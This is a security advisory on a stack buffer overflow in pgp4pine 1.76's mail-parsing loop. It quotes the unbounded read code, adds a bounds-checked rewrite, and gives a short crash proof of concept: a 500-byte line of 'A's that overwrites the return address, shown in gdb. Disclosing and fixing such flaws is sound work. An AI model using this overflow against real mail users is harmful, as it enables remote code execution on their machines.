Summary:
PGP4Pine is a wrapper that adds PGP encryption, decryption, signing and signature verification to pine. It is called from pine to parse the mail body and extract the PGP information from the message file. A vulnerability in the product allows a remote attacker to send a malicious email that causes PGP4Pine to execute arbitrary code on the recipient's machine.
Credit:
The information has been provided by Eric AUGE.
Vulnerable systems:
* pgp4pine version 1.76
Details:
When installed and configured within pine, PGP4Pine parses every incoming mail before pine is allowed to open it. PGP4Pine looks for PGP tokens and headers so that it can decrypt the message and confirm the sender's identity.
To verify incoming emails, PGP4Pine calls the following function in menus.c:
void fileVerifyDecryptMenu(char *inFile,char *outFile);
which reads the message line by line in this loop:
[...]
char readline[CONSOLE_IO_LINE_LENGTH];
(where defines.h has: #define CONSOLE_IO_LINE_LENGTH 256)
[...]
do {
    fertig=0;
    while (!fertig)
    {
        if ((c=getc(fin))==EOF)
        {
            outFile=inFile; /* this usually is not
                               executed, EOF breaks directly */
            return;
        }
        else if ((readline[i++]=c) == '\n')
        {
            readline[i]='\0';
            fertig=1;
        }
    }
    fertig=0;
    if (strncmp("-----BEGIN PGP SIGNED",readline,20)==0)
    {
        /* got signed message */
        fclose(fin);
        while (fileVerify(inFile,outFile) > 0); /* =1: Repeat */
        fertig=1;
    }
    else if (strncmp("-----BEGIN PGP",readline,14)==0)
    {
        /* got another type of PGP message (encrypted, keys ...) */
        fclose(fin);
        fileDecrypt(inFile,outFile);
        waitForReturn();
        fertig=1;
    }
    else
        i=0; /* Got waste line, reset i */
} while (!fertig);
[...]
As can be seen in the code, nothing checks the index i against the size of readline[]. A line longer than 255 characters (255 bytes plus the terminating newline is all the 256-byte buffer can hold) keeps being copied past the end of the array and overwrites whatever sits above it on the stack: the saved registers, including the frame pointer, and the return address of fileVerifyDecryptMenu():
[...]
        }
        else if ((readline[i++]=c) == '\n')
        {
[...]
The index is only reset to 0 after a complete line that turned out not to be a PGP header, so a single oversized line is enough to run past CONSOLE_IO_LINE_LENGTH and replace the saved registers before the loop ever reaches the EOF condition that would return from the function:
[...]
        if ((c=getc(fin))==EOF)
        {
            outFile=inFile; /* this usually is not
                               executed, EOF breaks directly */
            return;
        }
[...]
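The read loop above, rewritten with the bounds check it is missing, as an added example that is not code from pgp4pine or from the advisory's author. It keeps the same 256-byte buffer and the same two strncmp() prefix tests, but stores a byte only while there is room for it and the terminating NUL, drains the rest of an overlong line, and reports that the line was truncated. The names read_line_bounded(), classify_line(), scan_message(), scan_string() and sample_message(), and the constructed two-line message modelled on the advisory's 500-byte "A" line, are this example's own and not part of pgp4pine.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

/* Same limit as pgp4pine's defines.h. */
#define CONSOLE_IO_LINE_LENGTH 256

enum pgp_line { PGP_NONE = 0, PGP_SIGNED, PGP_OTHER };

struct scan_result {
    enum pgp_line kind;   /* first armor header found, or PGP_NONE at EOF */
    int line_no;          /* 1-based number of the matching (or last) line */
    int overlong_lines;   /* lines that did not fit in the buffer */
};

/*
 * Read one line from fin into buf (capacity cap, NUL included).
 * Returns the number of bytes stored (without the '\n' and the NUL),
 * or -1 when EOF is hit with nothing read. The original does
 * readline[i++] = c with no test on i; here a byte is stored only while
 * i + 1 < cap, and the remainder of an overlong line is read and
 * discarded so the caller resumes at the next line with *truncated set.
 */
static long read_line_bounded(FILE *fin, char *buf, size_t cap, bool *truncated)
{
    size_t i = 0;
    int c;

    *truncated = false;
    if (cap == 0)
        return -1;
    while ((c = getc(fin)) != EOF) {
        if (c == '\n') {
            buf[i] = '\0';
            return (long)i;
        }
        if (i + 1 < cap)
            buf[i++] = (char)c;
        else
            *truncated = true;      /* drain, never write past buf[cap - 1] */
    }
    if (i == 0 && !*truncated)
        return -1;                  /* clean EOF, no partial line pending */
    buf[i] = '\0';
    return (long)i;                 /* final line without a trailing '\n' */
}

/* The two prefix tests from fileVerifyDecryptMenu(), in the same order:
 * SIGNED must be tested first because the shorter prefix matches it too. */
static enum pgp_line classify_line(const char *line)
{
    static const char signed_hdr[] = "-----BEGIN PGP SIGNED";
    static const char armor_hdr[]  = "-----BEGIN PGP";

    if (strncmp(signed_hdr, line, sizeof signed_hdr - 1) == 0)
        return PGP_SIGNED;
    if (strncmp(armor_hdr, line, sizeof armor_hdr - 1) == 0)
        return PGP_OTHER;
    return PGP_NONE;
}

/* Walk the message like the do/while loop in menus.c, stopping at the first
 * armor header. An overlong line is counted and cannot overflow readline[]. */
static struct scan_result scan_message(FILE *fin)
{
    char readline[CONSOLE_IO_LINE_LENGTH];
    struct scan_result r = { PGP_NONE, 0, 0 };
    bool truncated;

    while (read_line_bounded(fin, readline, sizeof readline, &truncated) >= 0) {
        r.line_no++;
        if (truncated)
            r.overlong_lines++;
        r.kind = classify_line(readline);   /* the prefix survives truncation */
        if (r.kind != PGP_NONE)
            break;
    }
    return r;
}

/* Scan an in-memory message through a real FILE* (tmpfile() is ISO C). */
static struct scan_result scan_string(const char *msg)
{
    struct scan_result r = { PGP_NONE, 0, 0 };
    FILE *f = tmpfile();

    if (f == NULL)
        return r;
    fputs(msg, f);
    rewind(f);
    r = scan_message(f);
    fclose(f);
    return r;
}

/* Constructed sample input (not a real mail): a run of 'A's like the
 * advisory's testmail, then an ordinary clearsigned header. Static buffer. */
static const char *sample_message(size_t run_len)
{
    static char buf[4096];
    const char tail[] = "\n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n";
    size_t max_run = sizeof buf - sizeof tail;

    if (run_len > max_run)
        run_len = max_run;
    memset(buf, 'A', run_len);
    memcpy(buf + run_len, tail, sizeof tail);   /* copies the NUL too */
    return buf;
}

int main(void)
{
    struct scan_result r = scan_string(sample_message(500));

    printf("kind=%d line=%d overlong=%d\n", r.kind, r.line_no, r.overlong_lines);
    return 0;
}
```

With the 500-byte line the bounded reader reports one overlong line and still finds the clearsigned header on line 2; a 255-byte line fits exactly (255 bytes plus the NUL), and a 256-byte line is the first that the original loop would have written past the end of readline[].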
Exploit:
rival@bones ~/dev/test/pgp4pine-ex $ echo `perl -e 'print "A"x500'` > testmail
rival@bones ~/dev/test/pgp4pine-ex $ ./pgp4pine-vuln -d -i testmail
[...]
Segmentation fault (core dumped)
rival@bones ~/dev/test/pgp4pine-ex $ gdb ./pgp4pine-vuln core
[...]
Core was generated by `./pgp4pine-vuln -d -i testmail'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0 0x41414141 in ?? ()
(gdb)
Impact:
Since PGP4Pine processes every incoming email, a specially crafted message lets the sender execute arbitrary code on the recipient's machine as soon as the mail is opened, with the privileges of the user running pine. The 0x41414141 in the crash above is the "AAAA" filler from the oversized line landing in the saved return address: whoever controls the content of that line controls where execution resumes when fileVerifyDecryptMenu() returns.
Workaround/Solutions:
Deactivate PGP4Pine and use another PGP wrapper for pine, such as pgpenvelope (http://pgpenvelope.sourceforge.net/) or pinepgp (http://www.megaloman.com/~hany/software/pinepgp/stable.html).